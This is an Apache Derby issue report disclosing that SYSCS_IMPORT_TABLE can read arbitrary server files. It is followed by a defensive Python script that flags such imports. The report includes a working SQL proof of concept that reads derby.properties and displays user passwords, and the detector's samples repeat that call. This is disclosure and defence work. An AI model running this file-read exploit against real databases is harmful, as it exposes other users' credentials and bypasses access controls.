SYSCS_IMPORT_TABLE can be used to read derby files
--------------------------------------------------

                 Key: DERBY-2436
                 URL: https://issues.apache.org/jira/browse/DERBY-2436
             Project: Derby
          Issue Type: Bug
          Components: Security
            Reporter: Daniel John Debrunner
            Priority: Critical


There are no controls over which files SYSCS_IMPORT_TABLE can read, thus 
allowing any user that has permission to execute the procedure to try and 
access information that they have no permission to access. E.g. even with the 
secure-by-default network server I can execute three lines of SQL to view the 
contents of derby.properties, thus seeing passwords of other users, or the 
address of the LDAP server.

create table t (c varchar(32000));
CALL SYSCS_UTIL.SYSCS_IMPORT_TABLE(NULL, 'T', 'derby.properties', NULL, NULL, 
'ISO8859_1', 0);

ij> select * from T;
C
----------------------------------------------
derby.connection.requireAuthentication=true
derby.authentication.provider=BUILTIN
derby.user.SA=sapwd
derby.user.MARY=marypwd

Also a similar trick could be attempted against the actual data files, allowing 
a user to attempt to bypass grant/revoke security, especially now that binary 
data can be exported/imported.

-- 
This message is automatically generated by JIRA.
-
You can reply to this email to add a comment to the issue online.
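
A defender-side check for the pattern reported above, as an added example that is not part of the original report or of Derby's code: it scans captured SQL statement text for SYSCS_IMPORT_TABLE calls and flags any whose file argument resolves outside a designated import directory. The `audit` helper, the directory names and the sample statements are assumptions constructed for illustration.

```python
import posixpath
import re

# Matches the call from the report; the file name is the third argument.
CALL_RE = re.compile(r"SYSCS_UTIL\s*\.\s*SYSCS_IMPORT_TABLE\s*\(", re.IGNORECASE)
# One argument: a quoted SQL string ('' escapes a quote) or a bare token (NULL, 0).
ARG_RE = re.compile(r"\s*(?:'((?:[^']|'')*)'|([^,()'\s]+))\s*([,)])")


def import_file_args(sql):
    """Yield the file-name argument of every SYSCS_IMPORT_TABLE call in sql."""
    for call in CALL_RE.finditer(sql):
        pos, args = call.end(), []
        while True:
            m = ARG_RE.match(sql, pos)
            if m is None:  # malformed call: stop parsing it
                break
            args.append(m.group(1).replace("''", "'") if m.group(1) is not None else None)
            pos = m.end()
            if m.group(3) == ")":
                break
        if len(args) >= 3 and args[2] is not None:
            yield args[2]


def audit(statements, server_cwd, import_dir):
    """Return (file, resolved_path) for imports that read outside import_dir."""
    allowed = posixpath.normpath(import_dir)
    findings = []
    for sql in statements:
        for name in import_file_args(sql):
            # Assumption: relative names resolve against the server's working directory.
            resolved = posixpath.normpath(posixpath.join(server_cwd, name))
            if not resolved.startswith(allowed + "/"):
                findings.append((name, resolved))
    return findings


# Constructed sample statements (not taken from a real log).
SAMPLE = [
    "create table t (c varchar(32000))",
    "CALL SYSCS_UTIL.SYSCS_IMPORT_TABLE(NULL, 'T', 'derby.properties', NULL, NULL,\n'ISO8859_1', 0)",
    "CALL SYSCS_UTIL.SYSCS_IMPORT_TABLE(NULL, 'T', 'imports/../db/seg0/c10.dat', NULL, NULL, NULL, 0)",
    "call syscs_util.syscs_import_table('APP', 'ORDERS', 'imports/orders.csv', ',', '\"', 'UTF-8', 0)",
]

if __name__ == "__main__":
    for name, resolved in audit(SAMPLE, "/srv/derby", "/srv/derby/imports"):
        print(f"import outside allowed directory: {name!r} -> {resolved}")
```

Paths are normalised before the comparison, so a name such as `imports/../db/seg0/c10.dat` is flagged even though it begins with the allowed directory.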